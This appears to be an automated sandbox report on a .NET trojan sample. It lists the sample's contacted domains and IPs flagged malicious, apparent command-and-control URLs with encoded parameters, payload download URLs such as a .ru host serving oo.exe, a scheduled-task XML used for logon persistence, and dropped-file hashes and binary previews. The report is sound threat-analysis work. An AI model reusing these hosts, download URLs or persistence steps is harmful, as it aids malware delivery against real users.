http://www.fontbureau.com	explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.coml	explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	false		high
http://logo.verisign	explorer.exe, 00000006.00000000.264819810.000000000F440000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fonts.com	explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	J0OmHIagw8.exe, 00000000.00000002.238745092.0000000003261000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
192.0.78.208	unknown	United States	2635	AUTOMATTICUS	true
45.77.226.209	unknown	United States	20473	AS-CHOOPAUS	true
142.44.212.169	unknown	Canada	16276	OVHFR	true
146.148.193.212	unknown	United States	26658	HENGTONG-IDC-LLCUS	true
192.155.166.181	unknown	United States	132721	PING-GLOBAL-ASPingGlobalAmsterdamPOPASNNL	true
23.105.124.225	unknown	United States	7203	LEASEWEB-USA-SFO-12US	true
198.49.23.144	unknown	United States	53831	SQUARESPACEUS	false
173.234.175.134	unknown	United States	395954	LEASEWEB-USA-LAX-11US	true
34.102.136.180	unknown	United States	15169	GOOGLEUS	true
205.134.254.189	unknown	United States	22611	IMH-WESTUS	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	339323
Start date:	13.01.2021
Start time:	21:02:37
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	J0OmHIagw8.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	36
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@12/3@20/11
EGA Information:	Failed
HDC Information:	Successful, ratio: 36.5% (good quality ratio 33.5%) Quality average: 71.7% Quality standard deviation: 31.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 99 Number of non-executed functions: 158
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 13.64.90.137, 168.61.161.212, 23.210.248.85, 51.104.144.132, 92.122.213.194, 92.122.213.247, 67.26.81.254, 8.248.137.254, 67.27.158.126, 8.248.139.254, 8.248.133.254, 51.103.5.186, 52.155.217.156, 20.54.26.129, 205.201.132.26, 51.104.139.180, 204.79.197.200, 13.107.21.200 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, www-bing-com.dual-a-0001.a-msedge.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, terminator.capstone.com.akadns.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:03:37	API Interceptor	1x Sleep call for process: J0OmHIagw8.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
192.0.78.208	hO3eV0L7FB.exe	Get hash	malicious	Browse	www.logansshop.net/csv8/?lh28=O0GliFfpjJXxzb&LXe09=ZwKj9ShwklggAmvMfF0it6gA0E2+kz8+Lfh+752BzZBDlYhxiYZDgoXg2LG/wtUtDZzIGy8aoQ==
45.77.226.209	YT0nfh456s.exe	Get hash	malicious	Browse	www.fessusesefsee.com/csv8/?jFNHHj=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+YYNjj8xHGE1&Ppd=_6g8yvxH-6HLN
	Purchase_Order_39563854854.xlsx	Get hash	malicious	Browse	www.fessusesefsee.com/csv8/?AZ=+aP4wUbIbQNs+TbszdcGOO7le47nUjGI8OlnJqcnh3cPKzklTXpy3Tz49+ULoSo6SgwCOg==&1bqtf=oL30w6o
	4520182243_224333.jpg.js	Get hash	malicious	Browse	booomaahuuoooapl.ru/t.php?on=1
	4520182243_224333.jpg.js	Get hash	malicious	Browse	booomaahuuoooapl.ru/oo.exe
	6120184456_445675.jpg.js	Get hash	malicious	Browse	booomaahuuoooapl.ru/oo.exe
	6120184456_445675.jpg.js	Get hash	malicious	Browse	booomaahuuoooapl.ru/t.php?on=1
	5020189792_979255.jpg.js	Get hash	malicious	Browse	booomaahuuoooapl.ru/oo.exe
	5020189792_979255.jpg.js	Get hash	malicious	Browse	booomaahuuoooapl.ru/oo.exe
	1020182773_277307.jpg.js	Get hash	malicious	Browse	booomaahuuoooapl.ru/oo.exe
	1020182773_277307.jpg.js	Get hash	malicious	Browse	booomaahuuoooapl.ru/oo.exe
	020187178_717832.jpg.js	Get hash	malicious	Browse	booomaahuuoooapl.ru/oo.exe
	1220180178_017855.jpg.js	Get hash	malicious	Browse	booomaahuuoooapl.ru/oo.exe
	1220180178_017855.jpg.js	Get hash	malicious	Browse	booomaahuuoooapl.ru/oo.exe
	1420183796_379604.jpg.js	Get hash	malicious	Browse	booomaahuuoooapl.ru/oo.exe
	1420183796_379604.jpg.js	Get hash	malicious	Browse	booomaahuuoooapl.ru/oo.exe
	1020189484_948400.jpg.js	Get hash	malicious	Browse	booomaahuuoooapl.ru/oo.exe
	5720181654_165464.jpg.js	Get hash	malicious	Browse	booomaahuuoooapl.ru/oo.exe
	420185187_518739.jpg.js	Get hash	malicious	Browse	booomaahuuoooapl.ru/oo.exe
	1020186011_601176.jpg.js	Get hash	malicious	Browse	booomaahuuoooapl.ru/oo.exe
	1420185506_550645.jpg.js	Get hash	malicious	Browse	booomaahuuoooapl.ru/oo.exe
142.44.212.169	pHUWiFd56t.exe	Get hash	malicious	Browse	www.queensboutique1000.com/csv8/?LJB=GbtlyLR0j&Rxl=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvNxpBydMGHDH
142.44.212.169	Z7G2lyR0tT.exe	Get hash	malicious	Browse	www.queensboutique1000.com/csv8/?t8r8=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvORTRj90cgiA&9r1Tl=D4n4

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.travelnetafrica.com	Z7G2lyR0tT.exe	Get hash	malicious	Browse	173.234.175.134
www.exit-divorce.com	0XrD9TsGUr.exe	Get hash	malicious	Browse	192.155.166.181
	3Y690n1UsS.exe	Get hash	malicious	Browse	192.155.166.181
	Purchase_Order_39563854854.xlsx	Get hash	malicious	Browse	192.155.166.181
www.alparmuhendislik.com	JAAkR51fQY.exe	Get hash	malicious	Browse	23.105.124.225
	0XrD9TsGUr.exe	Get hash	malicious	Browse	23.105.124.225
	oJmp4QUPmP.exe	Get hash	malicious	Browse	23.105.124.225
	Order_009.xlsx	Get hash	malicious	Browse	23.105.124.225
	Z7G2lyR0tT.exe	Get hash	malicious	Browse	23.105.124.225
www.fessusesefsee.com	YT0nfh456s.exe	Get hash	malicious	Browse	45.77.226.209
www.fessusesefsee.com	Purchase_Order_39563854854.xlsx	Get hash	malicious	Browse	45.77.226.209
www.stnanguo.com	googlechrome_3843.exe	Get hash	malicious	Browse	146.148.193.212
	U0N4EBAJKJ.exe	Get hash	malicious	Browse	146.148.193.212
	Z7G2lyR0tT.exe	Get hash	malicious	Browse	146.148.193.212
ext-cust.squarespace.com	pHUWiFd56t.exe	Get hash	malicious	Browse	198.49.23.145
	Order_009.xlsx	Get hash	malicious	Browse	198.185.159.141
	List items.exe	Get hash	malicious	Browse	198.49.23.141
	PO8433L.exe	Get hash	malicious	Browse	198.185.159.141
	vOKMFxiCYt.exe	Get hash	malicious	Browse	198.49.23.141
	Payment Advice - Advice Ref GLV823990339.exe	Get hash	malicious	Browse	198.49.23.141
	NEW PO.exe	Get hash	malicious	Browse	198.185.159.141
	Quotation.exe	Get hash	malicious	Browse	198.185.159.145
	PO#646756575646.exe	Get hash	malicious	Browse	198.49.23.145
	PO#646756575646.exe	Get hash	malicious	Browse	198.185.159.145
	PO8479349743085.exe	Get hash	malicious	Browse	198.185.159.144
	PO8479349743085.exe	Get hash	malicious	Browse	198.185.159.145
	PO8479349743085.exe	Get hash	malicious	Browse	198.49.23.144
	vSCyL8NNIC.exe	Get hash	malicious	Browse	198.185.159.145
	plusnew.exe	Get hash	malicious	Browse	198.49.23.144
	Shipping Documents.exe	Get hash	malicious	Browse	198.185.159.145
	invoice.exe	Get hash	malicious	Browse	198.185.159.144
	http://39unitedfrkesokoriorimiwsdystreetsmghg.duckdns.org/chnsfrnd1/vbc.exe	Get hash	malicious	Browse	198.185.159.145
	sample.exe	Get hash	malicious	Browse	198.49.23.145
	bXdiOPDmyZ.exe	Get hash	malicious	Browse	198.185.159.144

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-CHOOPAUS	DTwcHU5qyI.exe	Get hash	malicious	Browse	137.220.48.181
	4wCFJMHdEJ.exe	Get hash	malicious	Browse	45.32.95.179
	BSL 21 PYT.xlsx	Get hash	malicious	Browse	137.220.48.181
	20210111140930669.exe	Get hash	malicious	Browse	139.180.142.220
	H56P7iDwnJ.doc	Get hash	malicious	Browse	207.148.24.55
	Confirm!!!..exe	Get hash	malicious	Browse	107.191.37.252
	inv.exe	Get hash	malicious	Browse	141.164.40.157
	invoice.doc	Get hash	malicious	Browse	45.76.190.53
	Copy111.exe	Get hash	malicious	Browse	107.191.37.252
	rib.exe	Get hash	malicious	Browse	144.202.62.148
	56HTe9n3fI.exe	Get hash	malicious	Browse	45.76.137.184
	IMG30122020.exe	Get hash	malicious	Browse	198.13.52.21
	SecuriteInfo.com.Trojan.GenericKDZ.72142.10833.exe	Get hash	malicious	Browse	149.28.244.249
	SecuriteInfo.com.Trojan.GenericKDZ.72142.10833.exe	Get hash	malicious	Browse	149.28.244.249
	utox.exe	Get hash	malicious	Browse	45.32.38.24
	qsUJ9oNU6a.exe	Get hash	malicious	Browse	45.77.254.200
	SecuriteInfo.com.Trojan.Rasftuby.Gen.14.16943.exe	Get hash	malicious	Browse	45.77.254.200
	SecuriteInfo.com.Trojan.Rasftuby.Gen.14.10239.exe	Get hash	malicious	Browse	45.77.254.200
	SecuriteInfo.com.Trojan.Rasftuby.Gen.14.15706.exe	Get hash	malicious	Browse	45.77.254.200
	SecuriteInfo.com.Trojan.Rasftuby.Gen.14.1636.exe	Get hash	malicious	Browse	45.77.254.200
AUTOMATTICUS	3S1VPrT4IK.exe	Get hash	malicious	Browse	192.0.78.24
	pHUWiFd56t.exe	Get hash	malicious	Browse	192.0.78.138
	LOI.exe	Get hash	malicious	Browse	192.0.78.24
	Revise Order.exe	Get hash	malicious	Browse	192.0.78.24
	Order_385647584.xlsx	Get hash	malicious	Browse	192.0.78.138
	Consignment Details.exe	Get hash	malicious	Browse	192.0.78.134
	Shipping Documents PL&BL Draft.exe	Get hash	malicious	Browse	192.0.78.25
	SCAN_20210112140930669.exe	Get hash	malicious	Browse	192.0.78.24
	20210111140930669.exe	Get hash	malicious	Browse	192.0.78.24
	099898892.exe	Get hash	malicious	Browse	192.0.78.24
	QN08qH1zYv.exe	Get hash	malicious	Browse	192.0.78.25
	RF-E68-STD-2020-106.xlsx	Get hash	malicious	Browse	192.0.78.24
	PO21010699XYJ.exe	Get hash	malicious	Browse	192.0.78.24
	http://mckeepropainting.com/.adv3738diukjuctdyakbd/dhava93vdia11876dkb/ag38vdua3848dk/sajvd9484auad/ajd847vauadja/101kah474sbbadad/wose/Paint20200921_2219.pdf.html	Get hash	malicious	Browse	192.0.77.48
	catalogo TAWI group.exe	Get hash	malicious	Browse	192.0.78.25
	http://herculematerilesede.tumblr.com/	Get hash	malicious	Browse	192.0.77.40
	http://free.atozmanuals.com	Get hash	malicious	Browse	192.0.73.2
	https://canningelectricinc.wordpress.com/	Get hash	malicious	Browse	192.0.79.33
	rib.exe	Get hash	malicious	Browse	192.0.78.12
	http://getfreshnews.com/nuoazaojrnvenpyxyse	Get hash	malicious	Browse	192.0.73.2
OVHFR	JAAkR51fQY.exe	Get hash	malicious	Browse	149.202.23.211
	Notification_71823.xls	Get hash	malicious	Browse	51.254.89.251
	Notification_71823.xls	Get hash	malicious	Browse	51.254.89.251
	Notification_71823.xls	Get hash	malicious	Browse	51.254.89.251
	cremocompany-Invoice_216083-xlsx.html	Get hash	malicious	Browse	51.91.224.95
	brewin-Invoice024768-xlsx.Html	Get hash	malicious	Browse	145.239.131.55
	Documentos de pago.PDF.exe	Get hash	malicious	Browse	51.195.53.221
	facturas y datos bancarios.PDF____________.exe	Get hash	malicious	Browse	51.195.53.221
	Consignment Document PL&BL Draft.exe	Get hash	malicious	Browse	149.202.195.78
	cGLVytu1ps.exe	Get hash	malicious	Browse	213.186.33.5
	pHUWiFd56t.exe	Get hash	malicious	Browse	142.44.212.169
	Company Docs.exe	Get hash	malicious	Browse	54.39.152.114
	AG60273928I_COVID-19_SARS-CoV-2.doc	Get hash	malicious	Browse	51.79.161.36
	FQ5754217297FF.doc	Get hash	malicious	Browse	51.79.161.36
	FQ5754217297FF.doc	Get hash	malicious	Browse	51.79.161.36
	l0sjk3o.dll	Get hash	malicious	Browse	46.105.131.65
	Consignment Details.exe	Get hash	malicious	Browse	51.91.31.221
	tEsPDds30F.exe	Get hash	malicious	Browse	46.105.131.65
	neidyjzyu.dll	Get hash	malicious	Browse	46.105.131.65
	kmqwedm.dll	Get hash	malicious	Browse	46.105.131.65

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\AppData\Roaming\JcEEHoQdnETCO.exe	Order_00009.xlsx	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\J0OmHIagw8.exe.log Download File
Process:	C:\Users\user\Desktop\J0OmHIagw8.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5:	FED34146BF2F2FA59DCF8702FCC8232E
SHA1:	B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256:	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512:	1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Temp\tmpF65F.tmp Download File
Process:	C:\Users\user\Desktop\J0OmHIagw8.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1646
Entropy (8bit):	5.194647878447671
Encrypted:	false
SSDEEP:	24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB1tn:cbh47TlNQ//rydbz9I3YODOLNdq31
MD5:	06E33287E0C8713556ABA4895AB6E7A7
SHA1:	2A2D4CAC8873931736CBBB63A52A57258472F145
SHA-256:	2C8A59AA46BD19E023BB68BF13C95C6F5F853ABE23AAD49CA14082BB7CB05BED
SHA-512:	12F4619DE659BCD68B646F11B5EB6BB062CE87ECF09B1BA01E0E50E3F527011FA829DAA307931607E9F37FA66C47DBE6A405F7BD718D02E0B698EF91E1BA16CD
Malicious:	true
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true

C:\Users\user\AppData\Roaming\JcEEHoQdnETCO.exe Download File
Process:	C:\Users\user\Desktop\J0OmHIagw8.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	582656
Entropy (8bit):	7.865649202994036
Encrypted:	false
SSDEEP:	12288:fKNVSrQjhTHD1L3YhRr/3DRaRDt2eM2pB81ey:8VMyzDJYhRrFadt2c1
MD5:	92FF500A693078263908C83B4B290481
SHA1:	FA5DCC6012C71490EFDF320791A90C7A18958A95
SHA-256:	767B1B32D4AC4CEC73967590CA5B28C3E0F4D709C0773E3F4021774F15A2483A
SHA-512:	8478C8B88309D55C83AB4A5F3AF0367F19BB02A2B62DB4A790FF7E867AA0FFE422CD4D177BBD3AD25D19CD0049ED196EC3910A72C7E3935FED0991CC783F0D1D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Joe Sandbox View:	Filename: Order_00009.xlsx, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j.l...............0......(........... ........@.. .......................@............@.................................D...O........$................... ......(................................................ ............... ..H............text........ ...................... ..`.rsrc....$.......&..................@..@.reloc....... ......................@..B................x.......H...........\.......K...@K..............................................0..B........s.........(.......(.....(.......(....o.......s....(.......(.....".(.......0..............r...p..(......9.........s........s ......8........a...%..=.o!.........o"...ri..p(#.......,q.....o"....(#.......,Z.+:....a...%..=.o!.........o"...r{..p(#.......,.......($...&...o%...%.r...po&..........-......o%...%........:L......&......o'........&.......+...*.......,......................0...........s(.

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.865649202994036
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	J0OmHIagw8.exe
File size:	582656
MD5:	92ff500a693078263908c83b4b290481
SHA1:	fa5dcc6012c71490efdf320791a90c7a18958a95
SHA256:	767b1b32d4ac4cec73967590ca5b28c3e0f4d709c0773e3f4021774f15a2483a
SHA512:	8478c8b88309d55c83ab4a5f3af0367f19bb02a2b62db4a790ff7e867aa0ffe422cd4d177bbd3ad25d19cd0049ed196ec3910a72c7e3935fed0991cc783f0d1d
SSDEEP:	12288:fKNVSrQjhTHD1L3YhRr/3DRaRDt2eM2pB81ey:8VMyzDJYhRrFadt2c1
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j.l...............0......(........... ........@.. .......................@............@................................

File Icon


Icon Hash:	10d0c4ccccc4f000

Static PE Info

General
Entrypoint:	0x48d896
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x8C6CE96A [Sat Aug 27 21:58:02 2044 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8d844	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8e000	0x2414	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x92000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8d828	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
